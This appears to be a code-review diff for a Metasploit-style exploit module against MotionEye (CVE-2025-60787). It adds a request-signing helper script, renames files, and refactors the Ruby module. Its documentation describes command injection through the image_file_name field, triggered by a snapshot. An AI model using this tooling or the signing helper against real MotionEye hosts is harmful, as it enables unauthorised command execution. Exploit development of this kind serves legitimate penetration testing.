code review changes from smcintyre-r7@

Author: vognik

data/exploits/CVE-2025-60787/sign_request.py

@@ -0,0 +1,88 @@
+import hashlib
+import re
+import argparse
+import sys
+from urllib.parse import urlsplit, parse_qs, unquote, quote
+from typing import Dict, List, Tuple
+
+_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
+
+def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
+    if not method or not path:
+        raise ValueError("Method and path must be provided.")
+
+    url_parts = urlsplit(path)
+    base_path = url_parts.path
+    
+    if not base_path.startswith('/'):
+        base_path = '/' + base_path
+    
+    raw_query_params: Dict[str, List[str]] = parse_qs(
+        url_parts.query, keep_blank_values=True, strict_parsing=False
+    )
+    
+    canonical_query: List[Tuple[str, str]] = []
+    for k, v_list in raw_query_params.items():
+        if k == '_signature':
+            continue
+            
+        value = unquote(v_list[0]) if v_list else ''
+        canonical_query.append((k, value))
+    
+    canonical_query.sort(key=lambda item: item[0])
+    
+    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
+
+    if query_string:
+        canonical_path = f"{base_path}?{query_string}"
+    else:
+        canonical_path = base_path
+        
+    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
+
+    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
+    
+    if not key:
+        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    else:
+        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
+
+    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
+    
+    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
+
+def main():
+    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
+
+    parser.add_argument('--method', type=str, required=True,
+                        choices=['GET', 'POST', 'PUT', 'DELETE'],
+                        help="The HTTP method (e.g., GET).")
+    parser.add_argument('--path', type=str, required=True,
+                        help="The canonical path (e.g., /api/resource?param=value).")
+    parser.add_argument('--key', type=str, default='',
+                        help="The secret key. Defaults to an empty string.")
+    parser.add_argument('--body', type=str, default='',
+                        help="The request body as a string. Defaults to an empty string.")
+
+    try:
+        args = parser.parse_args()
+        
+        signature = compute_signature(
+            method=args.method,
+            path=args.path,
+            body=args.body,
+            key=args.key
+        )
+
+        print(f"Computed Signature: {signature}")
+
+    except ValueError as e:
+        sys.stderr.write(f"Error: {e}\n")
+        sys.exit(1)
+    except Exception as e:
+        sys.stderr.write(f"An unexpected error occurred: {e}\n")
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    main()

documentation/modules/exploit/multi/http/motioneye_auth_rce_cve_2025_60787.md renamed to documentation/modules/exploit/linux/http/motioneye_auth_rce_cve_2025_60787.md

@@ -13,7 +13,7 @@ An attacker can execute arbitrary system commands in the context of the user run
 ## Exploit Workflow
 
 1. Adds a new camera in MotionEye Frontend.
-2. Injects the payload into the image_file_name field (used for naming camera screenshots).
+2. Injects the payload into the `image_file_name` field (used for naming camera screenshots).
 3. Captures a screenshot ("snapshot" in the terminology of MotionEye), triggering the payload.
 
 ## Testing
@@ -104,102 +104,9 @@ BUG_REPORT_URL="https://bugs.debian.org/"
 
 ## Script for signing requests
 
-The application verifies request signatures, so I wrote a small script to sign requests manually.
-
-You won't need it if you use the exploit, but it can be useful for debugging.
-
-```
-import hashlib
-import re
-import argparse
-import sys
-from urllib.parse import urlsplit, parse_qs, unquote, quote
-from typing import Dict, List, Tuple
-
-_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
-
-def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
-    if not method or not path:
-        raise ValueError("Method and path must be provided.")
-
-    url_parts = urlsplit(path)
-    base_path = url_parts.path
-    
-    if not base_path.startswith('/'):
-        base_path = '/' + base_path
-    
-    raw_query_params: Dict[str, List[str]] = parse_qs(
-        url_parts.query, keep_blank_values=True, strict_parsing=False
-    )
-    
-    canonical_query: List[Tuple[str, str]] = []
-    for k, v_list in raw_query_params.items():
-        if k == '_signature':
-            continue
-            
-        value = unquote(v_list[0]) if v_list else ''
-        canonical_query.append((k, value))
-    
-    canonical_query.sort(key=lambda item: item[0])
-    
-    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
-
-    if query_string:
-        canonical_path = f"{base_path}?{query_string}"
-    else:
-        canonical_path = base_path
-        
-    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
-
-    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
-    
-    if not key:
-        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
-    else:
-        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
-
-    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
-    
-    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
-
-def main():
-    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
-
-    parser.add_argument('--method', type=str, required=True,
-                        choices=['GET', 'POST', 'PUT', 'DELETE'],
-                        help="The HTTP method (e.g., GET).")
-    parser.add_argument('--path', type=str, required=True,
-                        help="The canonical path (e.g., /api/resource?param=value).")
-    parser.add_argument('--key', type=str, default='',
-                        help="The secret key. Defaults to an empty string.")
-    parser.add_argument('--body', type=str, default='',
-                        help="The request body as a string. Defaults to an empty string.")
-
-    try:
-        args = parser.parse_args()
-        
-        signature = compute_signature(
-            method=args.method,
-            path=args.path,
-            body=args.body,
-            key=args.key
-        )
-
-        print(f"Computed Signature: {signature}")
-
-    except ValueError as e:
-        sys.stderr.write(f"Error: {e}\n")
-        sys.exit(1)
-    except Exception as e:
-        sys.stderr.write(f"An unexpected error occurred: {e}\n")
-        sys.exit(1)
-
-
-if __name__ == '__main__':
-    main()
-```
+A script for manually signing requests is available in data/exploits/CVE-2025-60787/sign_request.py and can be used for debugging purposes.
 
 Example of usage:
 ```
-python3 ./main.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body "" --key ""
+python3 ./sign_request.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body "" --key ""
 ```

modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb renamed to modules/exploits/linux/http/motioneye_auth_rce_cve_2025_60787.rb

@@ -124,12 +124,7 @@ def compute_signature(method, path, body = nil, key = '')
     cleaned_path = clean_string(canonical_path)
     cleaned_body = clean_string(body)
 
-    if key.empty?
-      # SHA1 hash of an empty string
-      key_hash = 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
-    else
-      key_hash = Digest::SHA1.hexdigest(key).downcase
-    end
+    key_hash = Digest::SHA1.hexdigest(key).downcase
 
     data = "#{method}:#{cleaned_path}:#{cleaned_body}:#{key_hash}"
 
@@ -180,10 +175,6 @@ def send_signed_request_cgi(opts = {})
     return send_request_cgi(new_opts)
   end
 
-  def random_ipv4
-    Array.new(4) { rand(0..255) }.join('.')
-  end
-
   def add_camera
     print_status('Adding malicious camera...')
 
@@ -193,7 +184,7 @@ def add_camera
       'ctype' => 'application/json',
       'data' => {
         'scheme' => 'rstp',
-        'host' => random_ipv4,
+        'host' => Faker::Internet.ip_v4_address,
         'port' => '',
         'path' => '/',
         'username' => '',